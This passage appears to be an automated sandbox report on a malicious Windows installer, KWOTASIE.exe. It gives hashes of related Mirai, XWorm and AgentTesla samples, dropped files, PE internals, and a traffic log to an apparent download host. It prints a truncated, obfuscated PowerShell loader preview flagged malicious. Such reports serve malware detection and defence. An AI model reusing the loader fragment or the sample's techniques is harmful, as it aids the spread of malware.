            CKL1-ASNKEmirai.x86.elfGet hashmaliciousMiraiBrowse
            • 102.238.199.112
            jew.arm.elfGet hashmaliciousUnknownBrowse
            • 102.213.201.15
            XNP1BNVNqi.elfGet hashmaliciousMiraiBrowse
            • 102.236.154.57
            GIW8jzBGQQ.elfGet hashmaliciousMirai, MoobotBrowse
            • 102.3.158.63
            SR9qYL1hLF.elfGet hashmaliciousMirai, MoobotBrowse
            • 102.197.152.10
            DCwYFBy6z7.elfGet hashmaliciousMirai, MoobotBrowse
            • 102.3.230.182
            enjTj0J3qX.elfGet hashmaliciousMirai, MoobotBrowse
            • 102.208.4.118
            yUFX4wGvLW.elfGet hashmaliciousMirai, MoobotBrowse
            • 102.205.164.182
            CDMZxujRpn.elfGet hashmaliciousMiraiBrowse
            • 102.234.203.106
            owONvNMYXu.elfGet hashmaliciousMiraiBrowse
            • 102.2.18.109
            xneeloZAhmips.elfGet hashmaliciousMiraiBrowse
            • 156.38.239.164
            ywX6tbIdM4.elfGet hashmaliciousMirai, GafgytBrowse
            • 156.38.239.159
            McEifYLrJn.elfGet hashmaliciousMirai, GafgytBrowse
            • 41.203.27.58
            UdjXCm3X2k.elfGet hashmaliciousMirai, GafgytBrowse
            • 156.38.239.173
            3vnlP8ewPQ.elfGet hashmaliciousMirai, GafgytBrowse
            • 156.38.239.176
            d694nfRb7c.elfGet hashmaliciousMirai, GafgytBrowse
            • 156.38.239.158
            mips.elfGet hashmaliciousMirai, GafgytBrowse
            • 156.38.239.181
            i686.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 197.221.56.218
            xVGenvURjj.elfGet hashmaliciousMiraiBrowse
            • 156.38.239.153
            RFQ - 122.exeGet hashmaliciousAgentTeslaBrowse
            • 102.130.114.30
            TUT-ASUSServerManager.exeGet hashmaliciousXWormBrowse
            • 208.95.112.1
            MicrosoftService.exeGet hashmaliciousXWormBrowse
            • 208.95.112.1
            F.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
            • 208.95.112.1
            x.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
            • 208.95.112.1
            java_update.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
            • 208.95.112.1
            Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
            • 208.95.112.1
            x433.exeGet hashmaliciousXWormBrowse
            • 208.95.112.1
            DriverUpdt.exeGet hashmaliciousXWormBrowse
            • 208.95.112.1
            rinvoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 208.95.112.1
            rQuotation.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            No context
            No context
            Process:C:\Users\user\Desktop\KWOTASIE.exe
            File Type:data
            Category:dropped
            Size (bytes):301672
            Entropy (8bit):7.7512997637002945
            Encrypted:false
            SSDEEP:6144:rrNi8ksyxJSl71bC5jwYo7pT+hvRp5qdJt7oNkfU5ukZG:rpi8++1ObodT+15qdJMk85uB
            MD5:AF97A27E9A77A40937410A3F779CDDAC
            SHA1:6A3422BE55263976FA91D7A0F998AA74A5280E98
            SHA-256:5022B68F80E7FE5AAB1D8F15EEEADCF111A0000D890E855E73D083B5A872C0E4
            SHA-512:6A8FD4BF40BD6EE2BE51BE4DB5ED5F7E57DCC1E559BA02FC19DEB4374E21B985769003C7FBFCCE2B058A7E2F006CE5158E61F238A995D6DAEA45C3CF81AE287C
            Malicious:false
            Reputation:low
            Preview:..\\....................g....iiii...KKKK.H...........S............................{................)..x.....U.rr..........AA.oo.TTTT........................dd.........{....... .........`.....i..Z...*...........6.2.r.........n..........+...u....................ZZ...(.....66.000.............n.BB...........q...BB.....z.............V..H..........................f.......rr.........L........===...$$............r............................,................1.........^..................^^..A..eeee....................e........................JJJJ.CC........A.....t........AAAA...............E......z............j............,.....b..........H...f....................&...8............JJ..*........\\\\\\\..YY.))).Y......GGG.....................5.....%..8...<<.g....i.......%%......$.99......n.33....6.rr....=.....f..---....................................T...........v................j...EE..5........II..ZZZZZ........B..,,.0.........}}............z.........zzzz.........^^^^^..............?......t.....q
            Process:C:\Users\user\Desktop\KWOTASIE.exe
            File Type:ASCII text, with very long lines (65536), with no line terminators
            Category:dropped
            Size (bytes):78801
            Entropy (8bit):5.142588222775932
            Encrypted:false
            SSDEEP:1536:o4Xtl8Bpx+qzIB9Sx/+6/3qt9S22qj39sL+NzfrR4LDmeOy9E4ilV6Jsp:ouULzIB9Bw3q2DL+l+me5036Cp
            MD5:31A731AA8D5E8D9C0A5187FF85A83CFF
            SHA1:BBD52C93350D12B643F854D05F6156444A8FE30D
            SHA-256:E2E9D9772728BC5C3272C18A0A4031104C88C0B8CF9507834A6881499BA12912
            SHA-512:9A7E3FE4EAEC8D6C47249C0E404CDD5A621B6528B978BC5E68BB3ED4E53AD5B8B6AFE4CF9898214247E746603B387FDF4253FD4E300C655B1025F3C616CAF4E3
            Malicious:true
            Reputation:low
            Preview:$Portliest=$Palladiums;<#Georgisme Hootches Sulfuric Nonvigilantness Welfares #><#Nonadmissible Efterladenskaben Sengepladserne Pediatrics Middelalderlige Forskningsraadenes #><#Neutrophilis Erythrosine Sluttotal Antianarchist Hypostasized #><#Masculinization Stokerfyrenes Malleifera Hved Acridness Thure #><#Cochleary Paediatrics Badgemen lseretarderede #><#Blusterers Fatalistens Registratorer Peroration Xerografis Fallents #>$Fntrrer = " Phantas;,npolish`$Bru,erfoOLargostilKursavand AlvorsmdTelotroca Opt getnNonstoicsQuipde,ekKirkemuseCentr lv=Udhamrea`$Semi,ubiPbehavio rSmrokkeroCystone,pHoldingsaF rehillg SkattetaLeveunhanBoxhaulsdEskadreriHeartt,rsHoactzintG nghameiPl.nlgnicGrandun,;HypalgesFLazinessudunhammenKanni alcExcogi.atHeresiariFarcerneo Selskabn command AfkobledPTurbomoteHan,urysrBeklagelu NonstralMamae,reaTa,esprotbwana.reeTankst t Autismdu(Variantk`$ Svovlp S Redni.gtRivebrtte .ivorcimTympanizn Drageeri Bandagin Nonac,egJerngrebsfri agdoms kkebreeImmens.rnSharpshonCoprop
            Process:C:\Users\user\Desktop\KWOTASIE.exe
            File Type:data
            Category:dropped
            Size (bytes):936997
            Entropy (8bit):0.298558099617445
            Encrypted:false
            SSDEEP:768:rtdyfSIjRWNERrlhGOR7gj7q9I+fZAowJIkf/nhJVPSiYLpZfuh6+LIG8Ynqr82q:T
            MD5:4E084DB2E273E4A59020BBC29508AE81
            SHA1:D868209019D2A9D9A26B1F227F04EB9B219693E3
            SHA-256:C083DD714E70F5CC134C4089592E54B59AB41EEAF39C5B4E8790DD833AE44D3E
            SHA-512:C4CE5667908CEBE9EBD8D522A0EBEB22FEEA74660D50C2A455BFC725E622AADD74A7BA19A2B8049A13CFA549C35FD222D7E953F82F5040CD6A087804686783E1
            Malicious:false
            Reputation:low
            Preview:..............................................................................u.......................................................................................................................................................................................................................................................N..............................O...............................................................D........].................................................../.......................................................................................................................................................................................................................................................................................................................\..........................................................:.............................................................T........p...........................................................................
            Process:C:\Users\user\Desktop\KWOTASIE.exe
            File Type:data
            Category:dropped
            Size (bytes):1213326
            Entropy (8bit):0.29589819793966354
            Encrypted:false
            SSDEEP:768:dA50+8EyTM35Je5aQLw16j5nQstwU+4Ub4oKHJZTdyreO+R3obqx1FALllowV+ZF:VwD
            MD5:6EC2BDAD06DDD76E3F6C1925058D2B73
            SHA1:4B5917C22D4742C3E633DEEEFE9C372B889B4D5F
            SHA-256:499C692019159C75D35F57BBA7424DA053F2E7E514A879CBB49EF80B1E1758EA
            SHA-512:0B847802F35711747788003BFB1CA9042CED842D9512FF3E5549DD68BABA81932F03F90E1FD152B4F83482FB077AE0FD15D54E84FEBB4D4FA00AA22203D37A75
            Malicious:false
            Reputation:low
            Preview:.......^...........................................................................................................................................................................................................................................................................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................S.....................................................................................................................................................................................{...............................................{......................................
            Process:C:\Users\user\Desktop\KWOTASIE.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):453
            Entropy (8bit):4.303279922517871
            Encrypted:false
            SSDEEP:12:+MypCFpoUASwD4bVTNXoRL8u9EEW7rJCwrxjaH8n:+MypCf9AHeVNSFEE+rJCwr93n
            MD5:C54B2D7A94C9CFAA7CD36FBC7657E98C
            SHA1:3B176E45475756E5F5CBD08EECD767BDC8A3A7F4
            SHA-256:3192D10054DBD993F7040DD679E45C1EEDFC5957C460A0DC5258E3DE347A1FFC
            SHA-512:6647715D729BDB5A3C725146BA54980A349C7AB193D1D6C1F461D0697B290ECBB6E1DA6F09CFA7448E4D034B2981940880F456295E8FA05CF4C577E7396F6534
            Malicious:false
            Reputation:low
            Preview:gangliest indfrielsen overvrelses interviewmulighed,bassets svineholdets anamneses.challa superexcellence woodie titchfield subaffluently rapunslen.fuldfoders bikinis diamyl flyvecertifikat pledge buccally triplett helflaske worldwide protoparent..brightsome afkobles plaskvaad oxhorn kvadrattallene nonponderable nsten handelsrejses trictrac..eksternatskolers druggist kammerherreinders slinkiest materielkonstruktion reeksporterne systemsikkerhederne,
            Process:C:\Users\user\Desktop\KWOTASIE.exe
            File Type:data
            Category:dropped
            Size (bytes):1323921
            Entropy (8bit):0.29486482686325105
            Encrypted:false
            SSDEEP:768:zgyJwiL1/UO5DVuTBoD+ts/IoOAB3svpD6UMXB64ptzRRMBerLtyIjRFrh6ztQM/:n2WA
            MD5:F64A268611E960C62221020057669447
            SHA1:6C9C7EAE2CEF81D2368DC5B8E0E222D4EAD7089A
            SHA-256:E33F853D9809EA1AAA0B32BAEE9249915BBBA63DD7F72A86008E5EC1F335D069
            SHA-512:9356FBB9FCD2B045406A55C9779658F2314651FACC377B62D14ACC3B38E2B26309B1EBCC867AE5021F2B4ABF27BE85DE6E858837E3B940AE696D185462D1F9C4
            Malicious:false
            Reputation:low
            Preview:............................................................................................................Y..............................................................................................?.....................n......................................................................................................................................................................................V.............................................................................................................................................................................................................................................................................................:...7..................................m....................................................................F.....................................V...M.V.....P............................@......................................................................................................................
            Process:C:\Users\user\Desktop\KWOTASIE.exe
            File Type:data
            Category:dropped
            Size (bytes):987571
            Entropy (8bit):0.299647195996518
            Encrypted:false
            SSDEEP:768:DSdZEZwfRWAyMufgApVv+BOXeWOJjNwq+bTEqeYvW+OHLSpgacX52fjWfd++Ler0:GbD
            MD5:321496DB5566568354AEE0164FE1711D
            SHA1:80A268D40DFCA8EAE08DE8D009853ACB05E299E8
            SHA-256:A8049A6F3660DA2F8DDB8E2E804BCB709C7E36085E522679F10EB6419B6CFF2B
            SHA-512:51E01D1EA24C66B7A82F65317946CEDCC871D1DE273C5CCCA825C06FA1D16961D9CFCF74E9C7D97DFFE1B26EE18518C323948C00C447BAE2D18584070AD7FC17
            Malicious:false
            Reputation:low
            Preview:.....................9.............................................................................................................................................................................^......................................T.......................................................................................................................................................................................................$.........................................................................~..................................................................................................c............................................................9.....................................................................................N..........................#.........................................................................................................................................................................................................`................
            Process:C:\Users\user\Desktop\KWOTASIE.exe
            File Type:data
            Category:dropped
            Size (bytes):722954
            Entropy (8bit):0.30033785621806824
            Encrypted:false
            SSDEEP:768:tbEIn2OOKGDbP6TfldCh+dtNj4htOuut2g0NTULBEEuzkur2aY:FSc
            MD5:97320D366F806D4009691BB49138BC55
            SHA1:45DE76F8B18BA7E7871A13C0B2138A285C985DFD
            SHA-256:D25C0746F17E0A8BE051818909EFD7340368A0E897493ED2059A8D5C33267871
            SHA-512:2B38DB827EFF9D525316DA0EC02D911F9C37EB0BAA38311169EDA3110AA2F809C33A76FCC6F32931DD380C8BD067DE2344D15A50E53523FB2FA860F65B581AB9
            Malicious:false
            Reputation:low
            Preview:.........................................................................................................................................................................................................................l..........................................................................|..........................................................................................................................................................................................................................................................:..............................................................c...........................................................................................................................................................................................F....................b........................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:modified
            Size (bytes):8003
            Entropy (8bit):4.840877972214509
            Encrypted:false
            SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
            MD5:106D01F562D751E62B702803895E93E0
            SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
            SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
            SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
            Entropy (8bit):7.569090830267937
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:KWOTASIE.exe
            File size:982'616 bytes
            MD5:ecbec21dcfa39a1131d2a79acdf73f88
            SHA1:6b9366674e34118ec2881ab8d0ae5a5f5077a44d
            SHA256:ca595e27f24e0fc84bd5627ec36baae36bcc24018e638ed2ec7c7a6b1fe7b653
            SHA512:5158aa940a2779ef4fbb4874fbef55135754c33d3370f0c3f807c082dc268a63eab099f03b8b855a65bf41dd3cf683b8284b728719e6935835aa7920a5aa6b9c
            SSDEEP:24576:tzBRHciaGiPc8t11WID3jCJO30866tZPIJIRP6n:rRHciaGiL1MU2k3KSAJT
            TLSH:D8250287FA284192EC0D49F146BF5C67CE15BE2155523B3A6E67BB054DF3022D23B22B
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...p..Y.................d...*.....
            Icon Hash:47e132531196311f
            Entrypoint:0x40333d
            Entrypoint Section:.text
            Digitally signed:true
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Time Stamp:0x597FCC70 [Tue Aug 1 00:33:52 2017 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:b34f154ec913d2d2c435cbd644e91687
            Signature Valid:false
            Signature Issuer:E=Essentializing@Kriminalistiske.Jak, O=Indfjelse, OU="Sammenstuv Hoopla ", CN=Indfjelse, L=Achille, S=Oklahoma, C=US
            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
            Error Number:-2146762487
            Not Before, Not After
            • 23/05/2024 09:06:02 23/05/2027 09:06:02
            Subject Chain
            • E=Essentializing@Kriminalistiske.Jak, O=Indfjelse, OU="Sammenstuv Hoopla ", CN=Indfjelse, L=Achille, S=Oklahoma, C=US
            Version:3
            Thumbprint MD5:2C71F7B674852080C23D98B8870870C8
            Thumbprint SHA-1:4241C59FE0A56B2B1005ED05A2A7841CA1FA8C36
            Thumbprint SHA-256:23D182CC2442C7613AC110B685EB6FEA321A9A18288AD47BBCCE5D311E119308
            Serial:34B5172AADDD4EDF8DF429F5A17EAE8BFEAC0FE8
            Instruction
            sub esp, 000002D4h
            push ebx
            push esi
            push edi
            push 00000020h
            pop edi
            xor ebx, ebx
            push 00008001h
            mov dword ptr [esp+14h], ebx
            mov dword ptr [esp+10h], 0040A2E0h
            mov dword ptr [esp+1Ch], ebx
            call dword ptr [004080A8h]
            call dword ptr [004080A4h]
            and eax, BFFFFFFFh
            cmp ax, 00000006h
            mov dword ptr [0042A20Ch], eax
            je 00007F4C888BF493h
            push ebx
            call 00007F4C888C2729h
            cmp eax, ebx
            je 00007F4C888BF489h
            push 00000C00h
            call eax
            mov esi, 004082B0h
            push esi
            call 00007F4C888C26A3h
            push esi
            call dword ptr [00408150h]
            lea esi, dword ptr [esi+eax+01h]
            cmp byte ptr [esi], 00000000h
            jne 00007F4C888BF46Ch
            push 0000000Ah
            call 00007F4C888C26FCh
            push 00000008h
            call 00007F4C888C26F5h
            push 00000006h
            mov dword ptr [0042A204h], eax
            call 00007F4C888C26E9h
            cmp eax, ebx
            je 00007F4C888BF491h
            push 0000001Eh
            call eax
            test eax, eax
            je 00007F4C888BF489h
            or byte ptr [0042A20Fh], 00000040h
            push ebp
            call dword ptr [00408044h]
            push ebx
            call dword ptr [004082A0h]
            mov dword ptr [0042A2D8h], eax
            push ebx
            lea eax, dword ptr [esp+34h]
            push 000002B4h
            push eax
            push ebx
            push 004216A8h
            call dword ptr [00408188h]
            push 0040A2C8h
            Programming Language:
            • [EXP] VC++ 6.0 SP5 build 8804
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x5bba8.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0xee5f00x1868
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x626d0x6400b2dd5d917f94d75528a11411abe5681cFalse0.6569921875data6.423132440637118IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x80000x138e0x14002914bac53cd4485c9822093463e4eea6False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0xa0000x203180x600c46c24ddc9bf88a6774bd207204164b9False0.4921875data3.906531854842304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .ndata0x2b0000x350000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x600000x5bba80x5bc00e47ef02d4c8809b82823fbc6d27165c4False0.5386500553474114data6.341485897093692IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_ICON0x603280x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.4889265319407048
            RT_ICON0xa23500x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.6356323198864309
            RT_ICON0xb2b780x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.7203589985829003
            RT_ICON0xb6da00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.7454356846473029
            RT_ICON0xb93480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.7938555347091932
            RT_ICON0xba3f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.8266393442622951
            RT_ICON0xbad780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8714539007092199
            RT_DIALOG0xbb1e00x140dataEnglishUnited States0.46875
            RT_DIALOG0xbb3200x11cdataEnglishUnited States0.6056338028169014
            RT_DIALOG0xbb4400xc4dataEnglishUnited States0.5918367346938775
            RT_DIALOG0xbb5080x60dataEnglishUnited States0.7291666666666666
            RT_GROUP_ICON0xbb5680x68dataEnglishUnited States0.7403846153846154
            RT_VERSION0xbb5d00x294OpenPGP Secret KeyEnglishUnited States0.5106060606060606
            RT_MANIFEST0xbb8680x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384
            DLLImport
            KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
            USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
            SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
            ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States
            TimestampSource PortDest PortSource IPDest IP
            Jul 2, 2024 08:14:30.690773964 CEST4971480192.168.2.5102.218.215.35
            Jul 2, 2024 08:14:30.695559025 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:30.695627928 CEST4971480192.168.2.5102.218.215.35
            Jul 2, 2024 08:14:30.695817947 CEST4971480192.168.2.5102.218.215.35
            Jul 2, 2024 08:14:30.700532913 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.656052113 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.656068087 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.656081915 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.656094074 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.656105995 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.656116962 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.656126976 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.656137943 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.656147957 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.656160116 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.656188011 CEST4971480192.168.2.5102.218.215.35
            Jul 2, 2024 08:14:31.656258106 CEST4971480192.168.2.5102.218.215.35
            Jul 2, 2024 08:14:31.661001921 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.661052942 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.661065102 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.661098003 CEST4971480192.168.2.5102.218.215.35
            Jul 2, 2024 08:14:31.661101103 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.661139011 CEST4971480192.168.2.5102.218.215.35
            Jul 2, 2024 08:14:31.661218882 CEST4971480192.168.2.5102.218.215.35
            Jul 2, 2024 08:14:31.890189886 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.890206099 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.890299082 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.890341997 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.890353918 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.890672922 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.890675068 CEST4971480192.168.2.5102.218.215.35
            Jul 2, 2024 08:14:31.890690088 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.890893936 CEST4971480192.168.2.5102.218.215.35
            Jul 2, 2024 08:14:31.890908957 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.890950918 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.890963078 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.891087055 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.891103029 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.891122103 CEST4971480192.168.2.5102.218.215.35
            Jul 2, 2024 08:14:31.891982079 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:31.892034054 CEST4971480192.168.2.5102.218.215.35
